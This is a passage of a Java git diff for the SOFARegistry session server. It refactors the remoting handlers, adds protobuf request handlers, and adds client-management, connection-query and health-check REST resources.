public Object doHandle(Channel channel, SubscriberRegister subscriberRegister) { + RegisterResponse registerResponse = new RegisterResponse(); + subscriberHandlerStrategy.handleSubscriberRegister( + channel, subscriberRegister, registerResponse); + return registerResponse; + } + + @Override + public Class interest() { + return SubscriberRegister.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberPbHandler.java new file mode 100644 index 000000000..40a71aafd --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberPbHandler.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.remoting.InvokeContext; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.core.model.SubscriberRegister; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.RemotingException; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufSerializer; +import com.alipay.sofa.registry.server.session.converter.pb.RegisterResponseConvertor; +import com.alipay.sofa.registry.server.session.converter.pb.SubscriberRegisterConvertor; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author zhuoyu.sjw + * @version $Id: SubscriberPbHandler.java, v 0.1 2018-04-02 16:03 zhuoyu.sjw Exp $$ + */ +public class SubscriberPbHandler extends AbstractClientDataRequestHandler { + + @Autowired SubscriberHandler subscriberHandler; + + @Override + protected Node.NodeType getConnectNodeType() { + return subscriberHandler.getConnectNodeType(); + } + + /** + * Reply object. + * + * @param channel the channel + * @param message the message + * @return the object + * @throws RemotingException the remoting exception + */ + @Override + public Object doHandle(Channel channel, SubscriberRegisterPb message) { + RegisterResponsePb.Builder builder = RegisterResponsePb.newBuilder(); + + if (channel instanceof BoltChannel) { + BoltChannel boltChannel = (BoltChannel) channel; + InvokeContext invokeContext = boltChannel.getBizContext().getInvokeContext(); + + if (null != invokeContext) { + // set client custom codec for request command if not null + Object clientCustomCodec = invokeContext.get(InvokeContext.BOLT_CUSTOM_SERIALIZER); + if (null == clientCustomCodec) { + invokeContext.put( + InvokeContext.BOLT_CUSTOM_SERIALIZER, ProtobufSerializer.PROTOCOL_PROTOBUF); + } + } + } + + SubscriberRegister register = SubscriberRegisterConvertor.convert2Java(message); + Object response = subscriberHandler.doHandle(channel, register); + if (!(response instanceof RegisterResponse)) { + return builder.setSuccess(false).setMessage("Unknown response type").build(); + } + + return RegisterResponseConvertor.convert2Pb((RegisterResponse) response); + } + + /** + * Interest class. + * + * @return the class + */ + @Override + public Class interest() { + return SubscriberRegisterPb.class; + } + + @Override + public Executor getExecutor() { + return subscriberHandler.getExecutor(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandler.java index c97e2608d..968ea485d 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandler.java @@ -19,39 +19,26 @@ import com.alipay.sofa.registry.core.model.SyncConfigRequest; import com.alipay.sofa.registry.core.model.SyncConfigResponse; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; import com.alipay.sofa.registry.server.session.strategy.SyncConfigHandlerStrategy; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author zhuoyu.sjw * @version $Id: SyncConfigHandler.java, v 0.1 2018-03-14 23:15 zhuoyu.sjw Exp $$ */ -public class SyncConfigHandler extends AbstractServerHandler { - @Autowired - private SyncConfigHandlerStrategy syncConfigHandlerStrategy; - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public InvokeType getInvokeType() { - return InvokeType.SYNC; - } +public class SyncConfigHandler extends AbstractClientDataRequestHandler { + @Autowired SyncConfigHandlerStrategy syncConfigHandlerStrategy; - @Override - public Object reply(Channel channel, Object message) throws RemotingException { - SyncConfigResponse response = new SyncConfigResponse(); - response.setSuccess(true); - syncConfigHandlerStrategy.handleSyncConfigResponse(response); - return response; - } + @Override + public Object doHandle(Channel channel, SyncConfigRequest request) { + SyncConfigResponse response = new SyncConfigResponse(); + response.setSuccess(true); + syncConfigHandlerStrategy.handleSyncConfigResponse(response); + return response; + } - @Override - public Class interest() { - return SyncConfigRequest.class; - } + @Override + public Class interest() { + return SyncConfigRequest.class; + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigPbHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigPbHandler.java new file mode 100644 index 000000000..1c2382c48 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigPbHandler.java @@ -0,0 +1,88 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.ResultPb; +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb; +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb; +import com.alipay.sofa.registry.core.model.SyncConfigResponse; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.RemotingException; +import com.alipay.sofa.registry.server.session.converter.pb.SyncConfigRequestConvertor; +import com.alipay.sofa.registry.server.session.converter.pb.SyncConfigResponseConvertor; +import java.util.concurrent.Executor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author zhuoyu.sjw + * @version $Id: SyncConfigPbHandler.java, v 0.1 2018-04-02 17:13 zhuoyu.sjw Exp $$ + */ +public class SyncConfigPbHandler extends AbstractClientDataRequestHandler { + + @Autowired SyncConfigHandler syncConfigHandler; + + @Override + protected Node.NodeType getConnectNodeType() { + return syncConfigHandler.getConnectNodeType(); + } + + /** + * Reply object. + * + * @param channel the channel + * @param message the message + * @return the object + * @throws RemotingException the remoting exception + */ + @Override + public Object doHandle(Channel channel, SyncConfigRequestPb message) { + Object response = + syncConfigHandler.doHandle(channel, SyncConfigRequestConvertor.convert2Java(message)); + if (!(response instanceof SyncConfigResponse)) { + return fail(); + } + + return SyncConfigResponseConvertor.convert2Pb((SyncConfigResponse) response); + } + + static SyncConfigResponsePb fail() { + SyncConfigResponsePb.Builder builder = SyncConfigResponsePb.newBuilder(); + return builder + .setResult( + ResultPb.newBuilder() + .setSuccess(false) + .setMessage("Unknown sync config response type") + .build()) + .build(); + } + + /** + * Interest class. + * + * @return the class + */ + @Override + public Class interest() { + return SyncConfigRequestPb.class; + } + + @Override + public Executor getExecutor() { + return syncConfigHandler.getExecutor(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandler.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandler.java index 07fd647ab..9fd3fae44 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandler.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandler.java @@ -23,30 +23,22 @@ import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: SubscriberHandler.java, v 0.1 2017-11-30 15:01 shangyu.wh Exp $ */ -public class WatcherHandler extends AbstractServerHandler { - @Autowired - private WatcherHandlerStrategy watcherHandlerStrategy; - - @Override - public Object reply(Channel channel, Object message) { - RegisterResponse result = new RegisterResponse(); - ConfiguratorRegister configuratorRegister = (ConfiguratorRegister) message; - watcherHandlerStrategy.handleConfiguratorRegister(channel, configuratorRegister, result); - return result; - } +public class WatcherHandler extends AbstractClientDataRequestHandler { - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } + @Autowired WatcherHandlerStrategy watcherHandlerStrategy; - @Override - public Class interest() { - return ConfiguratorRegister.class; - } + @Override + public Object doHandle(Channel channel, ConfiguratorRegister message) { + RegisterResponse result = new RegisterResponse(); + watcherHandlerStrategy.handleConfiguratorRegister(channel, message, result); + return result; + } -} \ No newline at end of file + @Override + public Class interest() { + return ConfiguratorRegister.class; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientManagerResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientManagerResource.java new file mode 100644 index 000000000..4afa30016 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientManagerResource.java @@ -0,0 +1,230 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.remoting.jersey.JerseyClient; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.connections.ConnectionsService; +import com.alipay.sofa.registry.server.session.mapper.ConnectionMapper; +import com.alipay.sofa.registry.server.session.registry.SessionRegistry; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; +import java.net.ConnectException; +import java.net.SocketTimeoutException; +import java.net.URI; +import java.util.*; +import java.util.concurrent.*; +import java.util.stream.Collectors; +import javax.ws.rs.*; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.MultivaluedHashMap; +import javax.ws.rs.core.MultivaluedMap; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * The type Clients open resource. + * + * @author kezhu.wukz + * @version $Id : ClientsResource.java, v 0.1 2018-11-22 19:04 kezhu.wukz Exp $$ + */ +@Path("api/clientManager") +@Produces(MediaType.APPLICATION_JSON) +public class ClientManagerResource { + + private static final Logger LOGGER = LoggerFactory.getLogger(ClientManagerResource.class); + + @Autowired private SessionRegistry sessionRegistry; + + @Autowired private SessionServerConfig sessionServerConfig; + @Autowired private MetaServerService metaNodeService; + @Autowired private ConnectionsService connectionsService; + + @Autowired private ConnectionMapper connectionMapper; + + private final ThreadPoolExecutor zoneSdkExecutor = + MetricsableThreadPoolExecutor.newExecutor("ZoneSdkExecutor", 20, 200); + + /** Client off */ + @POST + @Path("/clientOff") + public CommonResponse clientOff(@FormParam("ips") String ips) { + if (StringUtils.isEmpty(ips)) { + return CommonResponse.buildFailedResponse("ips is empty"); + } + String[] ipArray = StringUtils.split(ips.trim(), ';'); + List ipList = Arrays.asList(ipArray); + + List conIds = connectionsService.getIpConnects(ipList); + + if (!CollectionUtils.isEmpty(conIds)) { + sessionRegistry.remove(conIds); + LOGGER.info("clientOff conIds: {}", conIds.toString()); + } + + return CommonResponse.buildSuccessResponse(); + } + + /** Client on */ + @POST + @Path("/clientOpen") + public CommonResponse clientOn(@FormParam("ips") String ips) { + if (StringUtils.isEmpty(ips)) { + return CommonResponse.buildFailedResponse("ips is empty"); + } + String[] ipArray = StringUtils.split(ips.trim(), ';'); + List ipList = Arrays.asList(ipArray); + + if (!CollectionUtils.isEmpty(ipList)) { + List conIds = connectionsService.closeIpConnects(ipList); + LOGGER.info("clientOn conIds: {}", conIds.toString()); + } + + return CommonResponse.buildSuccessResponse(); + } + + /** Client off */ + @POST + @Path("/zone/clientOff") + public CommonResponse clientOffInZone(@FormParam("ips") String ips) { + if (StringUtils.isEmpty(ips)) { + return CommonResponse.buildFailedResponse("ips is empty"); + } + CommonResponse resp = clientOff(ips); + if (!resp.isSuccess()) { + return resp; + } + List servers = getOtherServersCurrentZone(); + if (servers.size() > 0) { + return concurrentSdkSend( + servers, + (URL url) -> { + JerseyClient jerseyClient = JerseyClient.getInstance(); + MultivaluedMap formData = new MultivaluedHashMap(); + formData.add("ips", ips); + return jerseyClient + .getClient() + .target(new URI(String.format("http://%s:%d", url.getIpAddress(), url.getPort()))) + .path("/api/clientManager/clientOff") + .request() + .buildPost(Entity.form(formData)) + .invoke(CommonResponse.class); + }, + 3000); + } + return CommonResponse.buildSuccessResponse(); + } + + /** Client on */ + @POST + @Path("/zone/clientOpen") + public CommonResponse clientOnInZone(@FormParam("ips") String ips) { + if (StringUtils.isEmpty(ips)) { + return CommonResponse.buildFailedResponse("ips is empty"); + } + CommonResponse resp = clientOn(ips); + if (!resp.isSuccess()) { + return resp; + } + List servers = getOtherServersCurrentZone(); + if (servers.size() > 0) { + return concurrentSdkSend( + servers, + (URL url) -> { + JerseyClient jerseyClient = JerseyClient.getInstance(); + MultivaluedMap formData = new MultivaluedHashMap(); + formData.add("ips", ips); + return jerseyClient + .getClient() + .target(new URI(String.format("http://%s:%d", url.getIpAddress(), url.getPort()))) + .path("/api/clientManager/clientOpen") + .request() + .buildPost(Entity.form(formData)) + .invoke(CommonResponse.class); + }, + 3000); + } + return CommonResponse.buildSuccessResponse(); + } + + public List getOtherServersCurrentZone() { + String localZone = sessionServerConfig.getSessionServerRegion(); + if (StringUtils.isNotBlank(localZone)) { + localZone = localZone.toUpperCase(); + } + List servers = + metaNodeService.getSessionServerList(localZone).stream() + .filter(server -> !server.equals(NetUtil.getLocalAddress().getHostAddress())) + .map(server -> new URL(server, sessionServerConfig.getHttpServerPort())) + .collect(Collectors.toList()); + return servers; + } + + @GET + @Path("/connectionMapper.json") + public Map connectionMapper() { + return connectionMapper.get(); + } + + private CommonResponse concurrentSdkSend(List servers, SdkExecutor executor, int timeoutMs) { + List responses = new ArrayList<>(servers.size()); + final CountDownLatch latch = new CountDownLatch(servers.size()); + servers.forEach( + url -> + zoneSdkExecutor.submit( + () -> { + CommonResponse resp = null; + try { + resp = executor.execute(url); + } catch (Exception e) { + if (e.getCause() instanceof ConnectException) { + resp = new CommonResponse(true, "ignored error: connection refused"); + return; + } + if (e.getCause() instanceof SocketTimeoutException) { + resp = new CommonResponse(true, "ignored error: connect timeout"); + return; + } + LOGGER.error("send clientoff other session error!url={}", url, e); + resp = new CommonResponse(false, e.getMessage()); + } finally { + responses.add(resp); + latch.countDown(); + } + })); + try { + latch.await(timeoutMs, TimeUnit.MILLISECONDS); + } catch (InterruptedException e) { + return CommonResponse.buildFailedResponse("execute timeout"); + } + Optional failedResponses = + responses.stream().filter(r -> !r.isSuccess()).findFirst(); + return failedResponses.orElseGet(CommonResponse::buildSuccessResponse); + } + + interface SdkExecutor { + CommonResponse execute(URL url) throws Exception; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientsOpenResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientsOpenResource.java index f081f7f2b..8e4ccce94 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientsOpenResource.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ClientsOpenResource.java @@ -17,20 +17,21 @@ package com.alipay.sofa.registry.server.session.resource; import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.sessionserver.CancelAddressRequest; import com.alipay.sofa.registry.server.session.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.util.CollectionUtils; - +import java.util.List; import javax.ws.rs.Consumes; import javax.ws.rs.POST; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; -import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; /** * The type Clients open resource. + * * @author zhuoyu.sjw * @version $Id : ClientsResource.java, v 0.1 2018-04-11 19:04 zhuoyu.sjw Exp $$ */ @@ -39,29 +40,28 @@ @Produces(MediaType.APPLICATION_JSON) public class ClientsOpenResource { - @Autowired - private Registry sessionRegistry; - - /** - * Client off common response. - * - * @param request the request - * @return the common response - */ - @POST - @Path("/off") - public CommonResponse clientOff(CancelAddressRequest request) { + @Autowired private Registry sessionRegistry; - if (null == request) { - return CommonResponse.buildFailedResponse("Request can not be null."); - } + /** + * Client off common response. + * + * @param request the request + * @return the common response + */ + @POST + @Path("/off") + public CommonResponse clientOff(CancelAddressRequest request) { - if (CollectionUtils.isEmpty(request.getConnectIds())) { - return CommonResponse.buildFailedResponse("ConnectIds can not be null."); - } + if (null == request) { + return CommonResponse.buildFailedResponse("Request can not be null."); + } - final List connectIds = request.getConnectIds(); - sessionRegistry.cancel(connectIds); - return CommonResponse.buildSuccessResponse(); + if (CollectionUtils.isEmpty(request.getConnectIds())) { + return CommonResponse.buildFailedResponse("ConnectIds can not be null."); } + + final List connectIds = request.getConnectIds(); + sessionRegistry.cancel(connectIds); + return CommonResponse.buildSuccessResponse(); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ConnectionsResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ConnectionsResource.java new file mode 100644 index 000000000..4aa713e01 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/ConnectionsResource.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.resource; + +import com.alipay.sofa.registry.server.session.connections.ConnectionsService; +import java.util.List; +import javax.ws.rs.*; +import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.Response; +import javax.ws.rs.core.Response.ResponseBuilder; +import org.springframework.beans.factory.annotation.Autowired; + +@Path("connections") +public class ConnectionsResource { + @Autowired private ConnectionsService connectionsService; + + @GET + @Path("query") + @Produces(MediaType.APPLICATION_JSON) + public Response query() { + ResponseBuilder builder = Response.status(Response.Status.OK); + List connectionsSet = connectionsService.getConnections(); + builder.entity(connectionsSet.toArray()); + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/HealthResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/HealthResource.java index 37afbd6c2..ba790bccb 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/HealthResource.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/HealthResource.java @@ -17,68 +17,83 @@ package com.alipay.sofa.registry.server.session.resource; import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.metrics.ReporterUtils; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerBootstrap; -import com.alipay.sofa.registry.server.session.node.RaftClientManager; -import org.springframework.beans.factory.annotation.Autowired; - +import com.alipay.sofa.registry.util.Bool; +import com.codahale.metrics.Gauge; +import com.codahale.metrics.MetricRegistry; +import javax.annotation.PostConstruct; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.Response; +import javax.ws.rs.core.Response.ResponseBuilder; +import javax.ws.rs.core.Response.Status; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: PushSwitchResource.java, v 0.1 2018-10-29 16:51 shangyu.wh Exp $ */ @Path("health") public class HealthResource { - @Autowired - private RaftClientManager raftClientManager; - - @Autowired - private SessionServerBootstrap sessionServerBootstrap; + @Autowired private SessionServerBootstrap sessionServerBootstrap; + + @PostConstruct + public void init() { + MetricRegistry metrics = new MetricRegistry(); + metrics.register("healthCheck", (Gauge) () -> getHealthCheckResult()); + ReporterUtils.startSlf4jReporter(60, metrics); + } + + @GET + @Path("check") + @Produces(MediaType.APPLICATION_JSON) + public Response checkHealth() { + ResponseBuilder builder = Response.status(Response.Status.OK); + CommonResponse response = getHealthCheckResult(); + builder.entity(response); + if (!response.isSuccess()) { + builder.status(Status.INTERNAL_SERVER_ERROR); + } - @GET - @Path("check") - @Produces(MediaType.APPLICATION_JSON) - public CommonResponse checkHealth() { + return builder.build(); + } - CommonResponse response; + protected StringBuilder getStatus(Bool result) { + StringBuilder sb = new StringBuilder("SessionServerBoot "); + boolean start = false; - StringBuilder sb = new StringBuilder("SessionServerBoot "); + start = sessionServerBootstrap.getMetaStart(); + sb.append(", MetaServerStart:").append(start); - boolean start = raftClientManager.getClientStart().get(); - boolean ret = start; - sb.append("RaftClientManager:").append(start); + start = sessionServerBootstrap.getSchedulerStart(); + sb.append(", SchedulerStart:").append(start); - start = sessionServerBootstrap.getMetaStart().get(); - ret = ret && start; - sb.append(", MetaServerStart:").append(start); + start = sessionServerBootstrap.getHttpStart(); + sb.append(", HttpServerStart:").append(start); - start = sessionServerBootstrap.getSchedulerStart().get(); - ret = ret && start; - sb.append(", SchedulerStart:").append(start); + start = sessionServerBootstrap.getServerStart(); + sb.append(", SessionServerStart:").append(start); - start = sessionServerBootstrap.getHttpStart().get(); - ret = ret && start; - sb.append(", HttpServerStart:").append(start); + start = sessionServerBootstrap.getServerForSessionSyncStart(); + sb.append(", ServerForSessionSyncStart:").append(start); - start = sessionServerBootstrap.getServerStart().get(); - ret = ret && start; - sb.append(", SessionServerStart:").append(start); + start = sessionServerBootstrap.getDataStart(); + sb.append(", ConnectDataServer:").append(start); - start = sessionServerBootstrap.getDataStart().get(); - ret = ret && start; - sb.append(", ConnectDataServer:").append(start); + result.setBool(start); + return sb; + } - if (ret) { - response = CommonResponse.buildSuccessResponse(sb.toString()); - } else { - response = CommonResponse.buildFailedResponse(sb.toString()); - } + private CommonResponse getHealthCheckResult() { + Bool ret = Bool.newFalse(); + String desc = getStatus(ret).toString(); - return response; - } -} \ No newline at end of file + return ret.isTrue() + ? CommonResponse.buildSuccessResponse(desc) + : CommonResponse.buildFailedResponse(desc); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionDigestResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionDigestResource.java index 25148c948..e3dd0df9e 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionDigestResource.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionDigestResource.java @@ -16,17 +16,30 @@ */ package com.alipay.sofa.registry.server.session.resource; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.CONNECT_ID_SPLIT; + +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.common.model.store.StoreData; import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.common.model.store.Watcher; +import com.alipay.sofa.registry.metrics.ReporterUtils; +import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; import com.alipay.sofa.registry.server.session.store.DataStore; import com.alipay.sofa.registry.server.session.store.Interests; import com.alipay.sofa.registry.server.session.store.Watchers; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.util.CollectionUtils; - +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.codahale.metrics.Gauge; +import com.codahale.metrics.MetricRegistry; +import com.google.common.collect.Lists; +import java.util.ArrayList; +import java.util.Collection; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import javax.annotation.PostConstruct; import javax.ws.rs.GET; import javax.ws.rs.POST; import javax.ws.rs.Path; @@ -34,160 +47,235 @@ import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; /** - * * @author shangyu.wh * @version $Id: SessionOpenResource.java, v 0.1 2018-03-21 11:06 shangyu.wh Exp $ */ @Path("digest") public class SessionDigestResource { - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; - - /** - * store watchers - */ - @Autowired - private Watchers sessionWatchers; - - /** - * store publishers - */ - @Autowired - private DataStore sessionDataStore; - - @Autowired - private SessionServerConfig sessionServerConfig; - - private final static String SUB = "SUB"; - - private final static String PUB = "PUB"; - - private final static String WAT = "WAT"; - - @GET - @Path("{type}/data/query") - @Produces(MediaType.APPLICATION_JSON) - public Map> getSessionDataByDataInfoId(@QueryParam("dataInfoId") String dataInfoId, - @PathParam("type") String type) { - Map> serverList = new HashMap<>(); - if (dataInfoId != null) { - Collection publishers = sessionDataStore - .getStoreDataByDataInfoId(dataInfoId); - Collection subscribers = sessionInterests.getInterests(dataInfoId); - Collection watchers = sessionWatchers.getWatchers(dataInfoId); - fillServerList(type, serverList, publishers, subscribers, watchers); - } + /** store subscribers */ + @Autowired private Interests sessionInterests; + + /** store watchers */ + @Autowired private Watchers sessionWatchers; + + /** store publishers */ + @Autowired private DataStore sessionDataStore; + + @Autowired private SessionServerConfig sessionServerConfig; + + private static final String LOCAL_ADDRESS = NetUtil.getLocalAddress().getHostAddress(); + + @Autowired private MetaServerService mataNodeService; - return serverList; + private static final String SUB = "SUB"; + + private static final String PUB = "PUB"; + + private static final String WAT = "WAT"; + + private static final String SESSION = "SESSION"; + + private static final String DATA = "DATA"; + + private static final String META = "META"; + + @PostConstruct + public void init() { + MetricRegistry metrics = new MetricRegistry(); + metrics.register("pushSwitch", (Gauge) () -> getPushSwitch()); + ReporterUtils.startSlf4jReporter(60, metrics); + } + + @GET + @Path("{type}/data/query") + @Produces(MediaType.APPLICATION_JSON) + public Map> getSessionDataByDataInfoId( + @QueryParam("dataInfoId") String dataInfoId, @PathParam("type") String type) { + Map> serverList = new HashMap<>(); + if (dataInfoId != null) { + Collection publishers = sessionDataStore.getDatas(dataInfoId); + Collection subscribers = sessionInterests.getDatas(dataInfoId); + Collection watchers = sessionWatchers.getDatas(dataInfoId); + fillServerList(type, serverList, publishers, subscribers, watchers); } - @POST - @Path("{type}/connect/query") - @Produces(MediaType.APPLICATION_JSON) - public Map> getSessionDataByConnectId(List connectIds, - final @PathParam("type") String type) { - Map> serverList = new HashMap<>(); - - if (connectIds != null) { - connectIds.forEach(connectId -> { - Map pubMap = sessionDataStore.queryByConnectId(connectId); - Map subMap = sessionInterests.queryByConnectId(connectId); - Map watcherMap = sessionWatchers.queryByConnectId(connectId); - - Collection publishers = - pubMap != null && !pubMap.isEmpty() ? pubMap.values() : new ArrayList<>(); - Collection subscribers = - subMap != null && !subMap.isEmpty() ? subMap.values() : new ArrayList<>(); - Collection watchers = - watcherMap != null && !watcherMap.isEmpty() ? watcherMap.values() : new ArrayList<>(); - fillServerList(type, serverList, publishers, subscribers, watchers); - }); - } - - return serverList; + return serverList; + } + + @POST + @Path("{type}/connect/query") + @Produces(MediaType.APPLICATION_JSON) + public Map> getSessionDataByConnectId( + List queryConnectIds, final @PathParam("type") String type) { + List connectIds = new ArrayList<>(queryConnectIds.size()); + for (String queryConnectId : queryConnectIds) { + String connectId = queryConnectId; + if (!queryConnectId.contains(CONNECT_ID_SPLIT)) { + connectId = + connectId + + CONNECT_ID_SPLIT + + LOCAL_ADDRESS + + ":" + + sessionServerConfig.getServerPort(); + } + connectIds.add(ConnectId.parse(connectId)); } - @GET - @Path("/data/count") - @Produces(MediaType.APPLICATION_JSON) - public String getSessionDataCount() { - long countSub = sessionInterests.count(); - long countPub = 